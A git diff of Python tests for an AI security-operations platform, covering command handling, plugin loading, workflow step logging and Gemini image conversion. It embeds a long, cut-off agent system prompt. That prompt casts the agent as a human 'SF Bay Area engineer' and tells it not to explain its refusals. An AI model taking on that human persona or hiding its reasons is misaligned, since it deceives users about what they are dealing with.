+    with patch("flocks.command.handler.run_direct_command", new=AsyncMock()) as run_mock:
+        run_mock.return_value.configure_mock(
+            handled=True, prompt=None, clear_screen=False, clear_history=False, text="ok"
+        )
+
+        handled = await handle_slash_command(
+            '/agents {"team":"blue"}',
+            parsed_command=parsed,
+            send_text=send_text,
+            send_prompt=send_prompt,
+        )
+
+    assert handled is True
+    run_mock.assert_awaited_once_with(
+        "agents",
+        args='{"team":"blue"}',
+        args_json={"team": "blue"},
+        surface=None,
+        session_id=None,
+    )
+    send_text.assert_awaited_once_with("ok")
+    send_prompt.assert_not_called()
diff --git a/tests/command/test_help_format.py b/tests/command/test_help_format.py
index c1ad20b85..18dc2960f 100644
--- a/tests/command/test_help_format.py
+++ b/tests/command/test_help_format.py
@@ -11,6 +11,7 @@ def test_list_help_commands_filters_by_surface(self):
         names = {command.name for command in commands}
 
         assert "help" in names
+        assert "goal" in names
         assert "mcp" in names
         assert "model" not in names
         assert "status" not in names
@@ -49,6 +50,7 @@ def test_agent_safe_help_only_lists_agent_safe_direct_commands(self):
         assert "/agents" in output
         assert "/workflows" in output
         assert "/mcp" in output
+        assert "/goal" not in output
         assert "/clear" not in output
         assert "/plan" not in output
         assert "/compact" not in output
diff --git a/tests/hub/test_bundled_tools.py b/tests/hub/test_bundled_tools.py
index a14b1a52b..16436e7c3 100644
--- a/tests/hub/test_bundled_tools.py
+++ b/tests/hub/test_bundled_tools.py
@@ -22,7 +22,12 @@
 import yaml
 
 from flocks.hub import catalog, local
-from flocks.hub.installer import _resolve_install_destination, install_plugin, uninstall_plugin
+from flocks.hub.installer import (
+    _refresh_runtime,
+    _resolve_install_destination,
+    install_plugin,
+    uninstall_plugin,
+)
 from flocks.hub.models import HubPluginManifest
 from flocks.hub.security import SKIP_NAMES, validate_package
 
@@ -129,6 +134,33 @@ def _write_bundled_tool(
 # _bundled_tool_roots
 # ---------------------------------------------------------------------------
 
+
+@pytest.mark.asyncio
+async def test_tool_runtime_refresh_clears_device_template_cache(monkeypatch):
+    """Refreshing the "device" runtime must drop the cached device templates."""
+    from flocks.config import api_versioning
+    from flocks.tool.device import plugin_index
+    from flocks.tool.registry import ToolRegistry
+
+    calls: list[str] = []
+    monkeypatch.setattr(ToolRegistry, "init", classmethod(lambda cls: calls.append("init")))
+    refresh_stub = classmethod(lambda cls: calls.append("refresh"))
+    monkeypatch.setattr(ToolRegistry, "refresh_plugin_tools", refresh_stub)
+    monkeypatch.setattr(
+        api_versioning,
+        "discover_api_service_descriptors",
+        lambda *, refresh=False: calls.append(f"discover:{refresh}") or [],
+    )
+    # Seed through monkeypatch so the module-level cache is restored on teardown
+    # even when an assertion below fails.
+    monkeypatch.setattr(plugin_index, "_template_cache", [], raising=False)
+
+    await _refresh_runtime("device")
+
+    assert plugin_index._template_cache is None
+    assert calls == ["init", "refresh", "discover:True"]
+
+
 class TestBundledToolRoots:
     def test_discovers_api_subdir_plugins(self, isolated_hub):
         _write_bundled_tool(
diff --git a/tests/ingest/test_kafka_manager.py b/tests/ingest/test_kafka_manager.py
index 4fe838823..199d8d2ac 100644
--- a/tests/ingest/test_kafka_manager.py
+++ b/tests/ingest/test_kafka_manager.py
@@ -21,6 +21,7 @@
 import pytest
 
 from flocks.ingest.kafka import manager as kafka_manager
+from flocks.workflow import execution_store
 from flocks.workflow.triggers.models import TriggerDefinition
 
 
@@ -257,6 +258,7 @@ async def test_trigger_workflow_compacts_kafka_execution_record(
     captured_input_params: dict = {}
     captured_exec_data: dict = {}
     captured_run_kwargs: dict = {}
+    recorded_steps: list[tuple[str, int, dict]] = []
 
     async def _fake_create_execution_record(workflow_id, *, input_params=None, exec_id=None):  # noqa: ANN001
         captured_input_params.update(input_params or {})
@@ -265,9 +267,31 @@ async def _fake_create_execution_record(workflow_id, *, input_params=None, exec_
     async def _fake_record_execution_result(workflow_id, exec_id, exec_data):  # noqa: ANN001
         captured_exec_data.update(exec_data)
 
+    async def _fake_record_execution_step(exec_id, step_index, step):  # noqa: ANN001
+        recorded_steps.append((exec_id, step_index, step))
+        return step
+
     def _fake_run_workflow(**kwargs):  # noqa: ANN003
         captured_run_kwargs.update(kwargs)
         large_alert = {"raw_log_id": "alert-1", "req_body": "x" * 50_000}
+        kwargs["on_step_complete"](
+            SimpleNamespace(
+                model_dump=lambda mode="json": {
+                    "node_id": "receive_alert",
+                    "inputs": {"kafka_message": {"alarmData": "x" * 50_000}},
+                    "outputs": {"raw_alerts": [large_alert]},
+                }
+            )
+        )
+        kwargs["on_step_complete"](
+            SimpleNamespace(
+                model_dump=lambda mode="json": {
+                    "node_id": "dedup_and_write",
+                    "inputs": {"filtered_alerts": [large_alert]},
+                    "outputs": {"enriched_alerts": [large_alert]},
+                }
+            )
+        )
         return SimpleNamespace(
             status="SUCCEEDED",
             error=None,
@@ -275,18 +299,7 @@ def _fake_run_workflow(**kwargs):  # noqa: ANN003
                 "enriched_alerts": [large_alert],
                 "kafka_messages": [{"raw_log_id": "alert-1"}],
             },
-            history=[
-                {
-                    "node_id": "receive_alert",
-                    "inputs": {"kafka_message": {"alarmData": "x" * 50_000}},
-                    "outputs": {"raw_alerts": [large_alert]},
-                },
-                {
-                    "node_id": "dedup_and_write",
-                    "inputs": {"filtered_alerts": [large_alert]},
-                    "outputs": {"enriched_alerts": [large_alert]},
-                },
-            ],
+            history=[],
             last_node_id="done",
             steps=2,
         )
@@ -294,6 +307,7 @@ def _fake_run_workflow(**kwargs):  # noqa: ANN003
     monkeypatch.setattr(kafka_manager, "create_execution_record", _fake_create_execution_record)
     monkeypatch.setattr(kafka_manager, "record_execution_result", _fake_record_execution_result)
     monkeypatch.setattr(kafka_manager, "run_workflow", _fake_run_workflow)
+    monkeypatch.setattr(execution_store, "record_execution_step", _fake_record_execution_step)
 
     await manager._trigger_workflow(
         "wf-compact",
@@ -305,12 +319,18 @@ def _fake_run_workflow(**kwargs):  # noqa: ANN003
     assert captured_input_params["kafka_message"]["alarmData"]["_type"] == "string"
     assert captured_input_params["kafka_message"]["alarmData"]["chars"] == 50_000
     assert captured_run_kwargs["history_mode"] == "summary"
+    assert callable(captured_run_kwargs["on_step_complete"])
     assert captured_exec_data["outputResults"] == {
         "_enriched_alerts_count": 1,
         "_kafka_messages_count": 1,
     }
-    assert captured_exec_data["executionLog"][0]["outputs"] == {"_raw_alerts_count": 1}
-    assert captured_exec_data["executionLog"][1]["inputs"] == {"_filtered_alerts_count": 1}
+    assert captured_exec_data["executionLog"] == []
+    assert captured_exec_data["stepCount"] == 2
+    assert recorded_steps[0][0] == "exec-compact"
+    assert recorded_steps[0][1] == 1
+    assert recorded_steps[0][2]["outputs"] == {"_raw_alerts_count": 1}
+    assert recorded_steps[1][1] == 2
+    assert recorded_steps[1][2]["inputs"] == {"_filtered_alerts_count": 1}
     assert len(json.dumps(captured_exec_data, ensure_ascii=False)) < 10_000
 
 
diff --git a/tests/ingest/test_syslog_manager_backpressure.py b/tests/ingest/test_syslog_manager_backpressure.py
index 3439553e0..13a581817 100644
--- a/tests/ingest/test_syslog_manager_backpressure.py
+++ b/tests/ingest/test_syslog_manager_backpressure.py
@@ -17,10 +17,12 @@
 from __future__ import annotations
 
 import asyncio
+from types import SimpleNamespace
 
 import pytest
 
 from flocks.ingest.syslog import manager as syslog_manager
+from flocks.workflow import execution_store
 from flocks.workflow.triggers.models import TriggerDefinition
 
 
@@ -169,6 +171,7 @@ async def test_trigger_workflow_applies_mapping_and_filter(
     manager = syslog_manager.SyslogManager()
     captured_run_kwargs: dict = {}
     recorded_exec_data: dict = {}
+    recorded_steps: list[tuple[str, int, dict]] = []
 
     async def _fake_create_execution_record(workflow_id, *, input_params=None, exec_id=None):  # noqa: ANN001
         return {"id": "exec-syslog", "workflowId": workflow_id, "inputParams": input_params}
@@ -176,8 +179,22 @@ async def _fake_create_execution_record(workflow_id, *, input_params=None, exec_
     async def _fake_record_execution_result(workflow_id, exec_id, exec_data):  # noqa: ANN001
         recorded_exec_data.update(exec_data)
 
+    async def _fake_record_execution_step(exec_id, step_index, step):  # noqa: ANN001
+        recorded_steps.append((exec_id, step_index, step))
+        return step
+
     def _fake_run_workflow(**kwargs):  # noqa: ANN003
         captured_run_kwargs.update(kwargs)
+        kwargs["on_step_complete"](
+            SimpleNamespace(
+                model_dump=lambda mode="json": {
+                    "node_id": "receive_alert",
+                    "node_type": "python",
+                    "inputs": {"message": "demo"},
+                    "outputs": {"ok": True},
+                }
+            )
+        )
         return type(
             "RunResult",
             (),
@@ -194,6 +211,7 @@ def _fake_run_workflow(**kwargs):  # noqa: ANN003
     monkeypatch.setattr(syslog_manager, "create_execution_record", _fake_create_execution_record)
     monkeypatch.setattr(syslog_manager, "record_execution_result", _fake_record_execution_result)
     monkeypatch.setattr(syslog_manager, "run_workflow", _fake_run_workflow)
+    monkeypatch.setattr(execution_store, "record_execution_step", _fake_record_execution_step)
 
     trigger = TriggerDefinition.model_validate(
         {
@@ -220,8 +238,14 @@ def _fake_run_workflow(**kwargs):  # noqa: ANN003
     assert captured_run_kwargs["inputs"]["message"] == "demo"
     assert captured_run_kwargs["inputs"]["hostname"] == "router-a"
     assert captured_run_kwargs["inputs"]["pipeline"] == "syslog"
+    assert callable(captured_run_kwargs["on_step_complete"])
+    assert recorded_steps[0][0] == "exec-syslog"
+    assert recorded_steps[0][1] == 1
+    assert recorded_steps[0][2]["node_id"] == "receive_alert"
     assert recorded_exec_data["triggerId"] == "syslog-alerts"
     assert recorded_exec_data["triggerSource"] == "udp://0.0.0.0:5514"
+    assert recorded_exec_data["executionLog"] == []
+    assert recorded_exec_data["stepCount"] == 1
 
     captured_run_kwargs.clear()
     await manager._trigger_workflow(
diff --git a/tests/integration/test_capability_awareness.py b/tests/integration/test_capability_awareness.py
index 42f1471bb..0cf15ecc0 100644
--- a/tests/integration/test_capability_awareness.py
+++ b/tests/integration/test_capability_awareness.py
@@ -294,9 +294,21 @@ async def test_rex_prompt_contains_skills_section(self):
         rex = await Agent.get("rex")
         prompt = rex.prompt or ""
         assert "### Available Skills" in prompt
-        assert "Load a skill when the task clearly matches its domain expertise." in prompt
+        assert "Call `skill_load` when the task clearly matches a skill's domain expertise." in prompt
         assert "Category + Skills Delegation System" not in prompt
 
+    @pytest.mark.asyncio
+    async def test_rex_prompt_points_to_im_send_tool(self):
+        """The Rex prompt should only point to the im_send_message tool, without embedding the full IM SOP."""
+        from flocks.agent.registry import Agent
+        rex = await Agent.get("rex")
+        prompt = rex.prompt or ""  # fall back to "" when the prompt is falsy so the `in` checks below still work
+        assert "im_send_message" in prompt
+        assert 'skill_load(name="im-send")' not in prompt
+        assert "### IM Send Protocol" not in prompt
+        assert "Execute this exact sequence" not in prompt
+        assert "IM Session Resolution for schedule_task_create" not in prompt
+
     @pytest.mark.asyncio
     async def test_rex_prompt_contains_workflow_section(self):
         """Rex prompt 应包含 workflow section。"""
diff --git a/tests/plugin/test_plugin.py b/tests/plugin/test_plugin.py
index f9a70be16..1e75807f4 100644
--- a/tests/plugin/test_plugin.py
+++ b/tests/plugin/test_plugin.py
@@ -214,6 +214,88 @@ def test_multiple_extension_points(self, tmp_path: Path):
         assert agent_items[0]["name"] == "agent-a"
         assert tool_items[0]["name"] == "tool-t"
 
+    def test_load_extension_scans_only_requested_extension(self, tmp_path: Path):
+        """Scoped loads should not scan or dispatch unrelated extension points."""
+        user_root = tmp_path / "user_plugins"
+        project_dir = tmp_path / "project"
+        _write_plugin(user_root / "agents", "user_agent.py", 'AGENTS = [{"name": "user-agent"}]\n')
+        _write_plugin(user_root / "tools", "tool.py", 'TOOLS = [{"name": "user-tool"}]\n')
+        _write_plugin(
+            project_dir / ".flocks" / "plugins" / "agents",
+            "project_agent.py",
+            'AGENTS = [{"name": "project-agent"}]\n',
+        )
+        extra_file = tmp_path / "extra.py"  # standalone source that declares both AGENTS and TOOLS
+        extra_file.write_text(
+            'AGENTS = [{"name": "extra-agent"}]\n'
+            'TOOLS = [{"name": "extra-tool"}]\n'
+        )
+
+        agent_items = []  # filled by the AGENTS consumer registered below
+        tool_items = []  # filled by the TOOLS consumer; expected to stay empty
+
+        PluginLoader._plugin_root = user_root  # class-level override; NOTE(review): presumably reset by a fixture outside this view
+        PluginLoader.register_extension_point(ExtensionPoint(
+            attr_name="AGENTS", subdir="agents",
+            consumer=lambda items, src: agent_items.extend(items),
+            item_type=dict, dedup_key=lambda d: d["name"],
+        ))
+        PluginLoader.register_extension_point(ExtensionPoint(
+            attr_name="TOOLS", subdir="tools",
+            consumer=lambda items, src: tool_items.extend(items),
+            item_type=dict, dedup_key=lambda d: d["name"],
+        ))
+
+        PluginLoader.load_extension(  # scoped load: only the AGENTS extension point is requested
+            "AGENTS",
+            extra_sources=[str(extra_file)],
+            project_dir=project_dir,
+        )
+
+        assert [item["name"] for item in agent_items] == [  # asserted order: user root, project dir, extra source
+            "user-agent",
+            "project-agent",
+            "extra-agent",
+        ]
+        assert tool_items == []  # no TOOLS items were dispatched, even though tool.py and extra.py declare them
+
+    def test_load_extension_can_load_legacy_entry_points(self, tmp_path: Path, monkeypatch):
+        """Scoped loads opt in to the legacy flocks.plugins entry-point group."""
+        loaded = []  # records each invocation of the fake entry-point target
+
+        class _FakeEntryPoint:  # stand-in entry point exposing only `name` and `load()`
+            name = "fake-tools"
+
+            def load(self):
+                def _target(_loader_cls):  # callable handed back by load(); its argument is ignored
+                    loaded.append("entry-point-called")
+
+                return _target
+
+        class _FakeEntryPoints:  # stand-in for the object returned by the patched entry_points()
+            def select(self, *, group: str):
+                assert group == "flocks.plugins"  # fails the test if any other group is queried
+                return [_FakeEntryPoint()]
+
+        PluginLoader._plugin_root = tmp_path / "user_plugins"  # directory is never created in this test
+        PluginLoader.register_extension_point(ExtensionPoint(
+            attr_name="TOOLS",
+            subdir="tools",
+            consumer=lambda items, src: None,
+        ))
+        monkeypatch.setattr(
+            "flocks.plugin.loader.importlib.metadata.entry_points",
+            lambda: _FakeEntryPoints(),
+        )
+
+        PluginLoader.load_extension(
+            "TOOLS",
+            project_dir=tmp_path / "project",
+            load_entry_points=True,  # the opt-in flag under test
+        )
+
+        assert loaded == ["entry-point-called"]  # the loaded target was called exactly once
+
     def test_dedup_first_wins(self, tmp_path: Path):
         agents_dir = tmp_path / "agents"
         _write_plugin(agents_dir, "a.py",
diff --git a/tests/provider/test_chinese_providers.py b/tests/provider/test_chinese_providers.py
index 642796274..92a7b1b5e 100644
--- a/tests/provider/test_chinese_providers.py
+++ b/tests/provider/test_chinese_providers.py
@@ -266,6 +266,11 @@ def test_threatbook_cn_llm_catalog(self):
         qwen = next(m for m in models if m.id == "qwen3.6-plus")
         assert qwen.capabilities.supports_vision is True
 
+        m3 = next(m for m in models if m.id == "minimax-m3")
+        assert m3.capabilities.supports_vision is True
+        assert m3.capabilities.supports_reasoning is True
+        assert m3.capabilities.interleaved["field"] == "reasoning_details"
+
         flash_cn = next(m for m in models if m.id == "deepseek-v4-flash")
         assert flash_cn.pricing.input == 1.0
         assert flash_cn.pricing.output == 2.0
diff --git a/tests/provider/test_google_gemini_fixes.py b/tests/provider/test_google_gemini_fixes.py
index dadd43ce7..747560452 100644
--- a/tests/provider/test_google_gemini_fixes.py
+++ b/tests/provider/test_google_gemini_fixes.py
@@ -19,8 +19,10 @@
 
 from __future__ import annotations
 
+import base64
 from typing import Any, Dict, List
 from unittest.mock import AsyncMock, MagicMock, patch
+from urllib.parse import quote
 
 import pytest
 
@@ -455,6 +457,83 @@ def test_convert_messages_db_exception_midloop_does_not_duplicate_history(self):
         )
         assert "memory user" in all_text, "fallback did not emit in-memory message"
 
+    def test_convert_messages_db_image_file_part_reads_bytes(self, tmp_path):  # file:// image part -> inline_data
+        provider = GoogleProvider()
+        image_path = tmp_path / "screenshot.png"
+        image_path.write_bytes(b"png-bytes")  # placeholder bytes, not a real PNG
+
+        mwp = MagicMock()  # fake message-with-parts entry returned by the patched MessageSync
+        mwp.info = MagicMock(role="user")
+        part = MagicMock()
+        part.type = "file"
+        part.mime = "image/png"
+        part.url = image_path.as_uri()  # file:// URI pointing at the temp image
+        mwp.parts = [part]
+
+        with patch("flocks.session.message.MessageSync") as mock_ms:  # list_with_parts returns the fake message
+            mock_ms.list_with_parts.return_value = [mwp]
+
+            _system, gemini_msgs = provider._convert_messages(
+                [ChatMessage(role="user", content="fallback")],
+                session_id="ses_with_image",
+            )
+
+        inline = gemini_msgs[0]["parts"][0]["inline_data"]
+        assert inline["mime_type"] == "image/png"
+        assert inline["data"] == base64.b64encode(b"png-bytes").decode("utf-8")  # base64 of the file's bytes
+
+    def test_convert_messages_db_download_url_image_file_part_reads_bytes(self, tmp_path):  # download-URL variant
+        provider = GoogleProvider()
+        image_path = tmp_path / "screenshot.png"
+        image_path.write_bytes(b"png-bytes")  # placeholder bytes, not a real PNG
+
+        mwp = MagicMock()  # fake message-with-parts entry returned by the patched MessageSync
+        mwp.info = MagicMock(role="user")
+        part = MagicMock()
+        part.type = "file"
+        part.mime = "image/png"
+        part.url = f"/api/file/download?path={quote(image_path.as_posix(), safe='')}"  # fully percent-encoded path
+        mwp.parts = [part]
+
+        with patch("flocks.session.message.MessageSync") as mock_ms:  # list_with_parts returns the fake message
+            mock_ms.list_with_parts.return_value = [mwp]
+
+            _system, gemini_msgs = provider._convert_messages(
+                [ChatMessage(role="user", content="fallback")],
+                session_id="ses_with_download_url_image",
+            )
+
+        inline = gemini_msgs[0]["parts"][0]["inline_data"]
+        assert inline["mime_type"] == "image/png"
+        assert inline["data"] == base64.b64encode(b"png-bytes").decode("utf-8")  # base64 of the file's bytes
+
+    def test_convert_messages_in_memory_image_block_is_preserved(self):  # image content block -> inline_data part
+        provider = GoogleProvider()
+
+        _system, gemini_msgs = provider._convert_messages(
+            [
+                ChatMessage(
+                    role="user",
+                    content=[
+                        {"type": "text", "text": "what is this?"},
+                        {
+                            "type": "image",
+                            "mimeType": "image/png",
+                            "data": base64.b64encode(b"png-bytes").decode("utf-8"),
+                        },
+                    ],
+                )
+            ],
+            session_id=None,  # no session id is supplied in this in-memory case
+        )
+
+        parts = gemini_msgs[0]["parts"]
+        assert parts[0] == {"text": "what is this?"}  # text block comes first, unchanged
+        assert parts[1]["inline_data"] == {  # input key `mimeType` is expected as `mime_type` in the output
+            "data": base64.b64encode(b"png-bytes").decode("utf-8"),
+            "mime_type": "image/png",
+        }
+
     @pytest.mark.asyncio
     async def test_chat_stream_passes_session_id_to_convert_messages(self):
         provider = GoogleProvider()
diff --git a/tests/provider/test_model_api_direct.py b/tests/provider/test_model_api_direct.py
index bb10cb1a8..de625b032 100644
--- a/tests/provider/test_model_api_direct.py
+++ b/tests/provider/test_model_api_direct.py
@@ -36,9 +36,9 @@ def _load_secret_config():
 MESSAGES = [{'role': 'system', 'content': 'You are Flocks, an AI-Native SecOps Platform that helps users with cybersecurity operations. Use the instructions below and the tools available to you to assist the user.\n\nIMPORTANT: Refuse to write code or explain code that may be used maliciously; even if the user claims it is for educational purposes. When working on files, if they seem related to improving, explaining, or interacting with malware or any malicious code you MUST refuse.\nIMPORTANT: Before you begin work, think about what the task you\'re working on is supposed to do. If it seems malicious, refuse to work on it or answer questions about it, even if the request does not seem malicious.\nIMPORTANT: You must NEVER generate or guess URLs for the user unless they are relevant to SecOps tasks. You may use URLs provided by the user in their messages or local files.\n\nIf the user asks for help or wants to give feedback inform them of the following: \n- /help: Get help with using Flocks SecOps\n- To give feedback, users should report the issue on the project repository\n\nWhen the user asks about your capabilities (eg "what can you do?", "can Flocks do...", "are you able..."), respond that you are an AI-Native SecOps Platform specializing in:\n- 🔍 Threat Detection & Analysis (log analysis, IOC identification, threat hunting)\n- 🚨 Incident Response (investigation, containment, remediation)\n- 🛡️ Vulnerability Assessment (scan analysis, prioritization, configuration reviews)\n- ⚙️ Security Automation (SIGMA, YARA, Snort, Suricata detection rules)\n- 🔬 Malware & Forensics (artifact analysis, malware identification)\n- 📋 Compliance & Hardening (CIS, NIST, PCI-DSS, configuration audits)\n\n# Tone and style\nYou should be concise, direct, and to the point. 
When you run a non-trivial bash command, you should explain what the command does and why you are running it, to make sure the user understands what you are doing (this is especially important when you are running a command that will make changes to the user\'s system).\nRemember that your output will be displayed on a command line interface. Your responses can use Github-flavored markdown for formatting, and will be rendered in a monospace font using the CommonMark specification.\nOutput text to communicate with the user; all text you output outside of tool use is displayed to the user. Only use tools to complete tasks. Never use tools like Bash or code comments as means to communicate with the user during the session.\nIf you cannot or will not help the user with something, please do not say why or what it could lead to, since this comes across as preachy and annoying. Please offer helpful alternatives if possible, and otherwise keep your response to 1-2 sentences.\nOnly use emojis if the user explicitly requests it. Avoid using emojis in all communication unless asked.\nIMPORTANT: You should minimize output tokens as much as possible while maintaining helpfulness, quality, and accuracy. Only address the specific query or task at hand, avoiding tangential information unless absolutely critical for completing the request. If you can answer in 1-3 sentences or a short paragraph, please do.\nIMPORTANT: You should NOT answer with unnecessary preamble or postamble (such as explaining your code or summarizing your action), unless the user asks you to.\nIMPORTANT: Keep your responses short, since they will be displayed on a command line interface. You MUST answer concisely with fewer than 4 lines (not including tool use or code generation), unless user asks for detail. Answer the user\'s question directly, without elaboration, explanation, or details. One word answers are best. Avoid introductions, conclusions, and explanations. 
You MUST avoid text before/after your response, such as "The answer is <answer>.", "Here is the content of the file..." or "Based on the information provided, the answer is..." or "Here is what I will do next...". Here are some examples to demonstrate appropriate verbosity:\n<example>\nuser: 2 + 2\nassistant: 4\n</example>\n\n<example>\nuser: what is 2+2?\nassistant: 4\n</example>\n\n<example>\nuser: is 11 a prime number?\nassistant: Yes\n</example>\n\n<example>\nuser: what command should I run to list files in the current directory?\nassistant: ls\n</example>\n\n<example>\nuser: what command should I run to watch files in the current directory?\nassistant: [use the ls tool to list the files in the current directory, then read docs/commands in the relevant file to find out how to watch files]\nnpm run dev\n</example>\n\n<example>\nuser: How many golf balls fit inside a jetta?\nassistant: 150000\n</example>\n\n<example>\nuser: what files are in the directory src/?\nassistant: [runs ls and sees foo.c, bar.c, baz.c]\nuser: which file contains the implementation of foo?\nassistant: src/foo.c\n</example>\n\n<example>\nuser: analyze these Apache logs for SQL injection attempts\nassistant: [uses read tool to load log files, searches for SQL injection patterns like UNION, OR 1=1, quotes in parameters, generates findings report with affected URLs and source IPs]\n</example>\n\n<example>\nuser: create a SIGMA rule for PowerShell download cradle detection\nassistant: [researches common PowerShell download patterns, uses read to check existing SIGMA rules for format reference, creates new rule with detection logic and MITRE ATT&CK mappings]\n</example>\n\n# Proactiveness\nYou are allowed to be proactive, but only when the user asks you to do something. You should strive to strike a balance between:\n1. Doing the right thing when asked, including taking actions and follow-up actions\n2. 
Not surprising the user with actions you take without asking\nFor example, if the user asks you how to approach something, you should do your best to answer their question first, and not immediately jump into taking actions.\n3. Do not add additional code explanation summary unless requested by the user. After working on a file, just stop, rather than providing an explanation of what you did.\n\n# Security Operations Best Practices\nWhen performing security analysis and automation:\n- **Evidence Preservation:** Document all findings with timestamps, file paths, line numbers, and relevant context for audit trails\n- **Data Privacy:** Be mindful of sensitive data in logs (credentials, PII, keys). Redact or reference without exposing in outputs\n- **Defensive Only:** All tools, scripts, and automation must be for defensive purposes - detection, monitoring, incident response, or compliance\n- **Verify Findings:** Validate potential security issues before declaring them as confirmed threats or vulnerabilities\n- **Context Matters:** Understand the security context - not all anomalies are malicious, consider business operations and environment\n- **Detection Quality:** When creating rules (SIGMA, YARA, Snort), balance detection coverage with false positive rates\n- **Secure Code:** When developing security tools, follow secure coding practices. 
Never expose secrets, use parameterized queries, validate inputs\n\n# Code style\n- IMPORTANT: DO NOT ADD ***ANY*** COMMENTS unless asked\n\n# SecOps Tasks\nThe user will primarily request you perform Security Operations tasks including:\n\n**Threat Detection & Analysis:**\n- Analyze logs (auth, web, network, system) for suspicious patterns and anomalies\n- Identify indicators of compromise (IOCs): malicious IPs, domains, file hashes, URLs\n- Hunt for threats using behavioral analysis and correlation across data sources\n- Detect attack techniques mapped to MITRE ATT&CK framework\n\n**Incident Response:**\n- Triage security alerts and determine severity/priority\n- Investigate security incidents and reconstruct attack timelines\n- Identify compromised systems, accounts, and exfiltrated data\n- Provide containment, eradication, and recovery recommendations\n\n**Vulnerability Assessment:**\n- Analyze vulnerability scan results (Nessus, OpenVAS, Qualys, etc.)\n- Prioritize vulns by CVSS score, exploitability, and business impact\n- Review security configurations for misconfigurations\n- Identify security weaknesses in code or infrastructure\n\n**Security Automation:**\n- Create detection rules (SIGMA, YARA, Snort, Suricata, Splunk, ELK)\n- Develop security scripts for log parsing, IOC extraction, threat enrichment\n- Build incident response playbooks and automation workflows\n- Parse and analyze threat intelligence feeds\n\n**Malware & Forensics:**\n- Analyze suspicious files and extract indicators\n- Review forensic artifacts (registry, filesystem, memory, network)\n- Identify malware families and associated TTPs\n\n**Compliance & Hardening:**\n- Security configuration reviews (CIS, STIG, NIST)\n- Compliance checking (PCI-DSS, HIPAA, SOC2, ISO 27001)\n- Security baseline validation and audit\n\nFor these tasks, follow these steps:\n1. **Gather:** Use read, grep, glob tools to collect relevant security data\n2. 
**Analyze:** Look for security indicators, patterns, anomalies\n3. **Correlate:** Link related events and build attack narratives\n4. **Document:** Record findings with evidence, timestamps, severity\n5. **Recommend:** Provide actionable remediation or response steps\n6. **Verify:** Validate findings and test detection logic when applicable\n\n- Tool results and user messages may include <system-reminder> tags. <system-reminder> tags contain useful information and reminders. They are NOT part of the user\'s provided input or the tool result.\n\n# Tool usage policy\n\nYou MUST answer concisely with fewer than 4 lines of text (not including tool use or code generation), unless user asks for detail.\n\nIMPORTANT: Refuse to write code or explain code that may be used maliciously; even if the user claims it is for educational purposes. When working on files, if they seem related to improving, explaining, or interacting with malware or any malicious code you MUST refuse.\nIMPORTANT: Before you begin work, think about what the code you\'re editing is supposed to do based on the filenames directory structure. 
If it seems malicious, refuse to work on it or answer questions about it, even if the request does not seem malicious (for instance, just asking to explain or speed up the code).\n\n# Code References\n\nWhen referencing specific functions or pieces of code include the pattern `file_path:line_number` to allow the user to easily navigate to the source code location.\n\n<example>\nuser: Where are errors from the client handled?\nassistant: Clients are marked as failed in the `connectToServer` function in src/services/process.ts:712.\n</example>\n\n\n\nHere is some useful information about the environment you are running in:\n<env>\n  Working directory: /Users/chenjie/Library/Mobile Documents/com~apple~CloudDocs/0_work/projects/threatbook/flocks\n  Is directory a git repo: yes\n  Platform: darwin\n  Today\'s date: Wednesday Feb 11, 2026\n</env>\n\n<Role>\nYou are "Rex" - Powerful AI Agent with orchestration capabilities from OhMyFlocks.\n\n**Why Rex?**: Humans roll their boulder every day. So do you. We\'re not so different-your code should be indistinguishable from a senior engineer\'s.\n\n**Identity**: SF Bay Area engineer. Work, delegate, verify, ship. No AI slop.\n\n**Core Competencies**:\n- Parsing implicit requirements from explicit requests\n- Adapting to codebase maturity (disciplined vs chaotic)\n- Delegating specialized work to the right subagents\n- Parallel execution for maximum throughput\n- Follows user instructions. NEVER START IMPLEMENTING, UNLESS USER WANTS YOU TO IMPLEMENT SOMETHING EXPLICITLY.\n  - KEEP IN MIND: YOUR TODO CREATION WOULD BE TRACKED BY HOOK([SYSTEM REMINDER - TODO CONTINUATION]), BUT IF NOT USER REQUESTED YOU TO WORK, NEVER START WORK.\n\n**Operating Mode**: You NEVER work alone when specialists are available. Frontend work -> delegate. Deep research -> parallel background agents (async subagents). 
Complex architecture -> consult Oracle.\n\n</Role>\n<Behavior_Instructions>\n\n## Phase 0 - Intent Gate (EVERY message)\n\n### Key Triggers (check BEFORE classification):\n\n- External library/source mentioned -> fire `librarian` background\n- 2+ modules involved -> fire `explore` background\n- Ambiguous or complex request -> consult Metis before Prometheus\n- Work plan created -> invoke Momus for review before execution\n- **"Look into" + "create PR"** → Not just research. Full implementation cycle expected.\n\n### Step 1: Classify Request Type\n\n| Type | Signal | Action |\n|------|--------|--------|\n| **Trivial** | Single file, known location, direct answer | Direct tools only (UNLESS Key Trigger applies) |\n| **Explicit** | Specific file/line, clear command | Execute directly |\n| **Exploratory** | "How does X work?", "Find Y" | Fire explore (1-3) + tools in parallel |\n| **Open-ended** | "Improve", "Refactor", "Add feature" | Assess codebase first |\n| **Ambiguous** | Unclear scope, multiple interpretations | Ask ONE clarifying question |\n\n### Step 2: Check for Ambiguity\n\n| Situation | Action |\n|-----------|--------|\n| Single valid interpretation | Proceed |\n| Multiple interpretations, similar effort | Proceed with reasonable default, note assumption |\n| Multiple interpretations, 2x+ effort difference | **MUST ask** |\n| Missing critical info (file, error, context) | **MUST ask** |\n| User\'s design seems flawed or suboptimal | **MUST raise concern** before implementing |\n\n### Step 3: Validate Before Acting\n\n**Assumptions Check:**\n- Do I have any implicit assumptions that might affect the outcome?\n- Is the search scope clear?\n\n**Delegation Check (MANDATORY before acting directly):**\n1. Is there a specialized agent that perfectly matches this request?\n2. If not, is there a `delegate_task` category best describes this task? (visual-engineering, ultrabrain, quick etc.) 
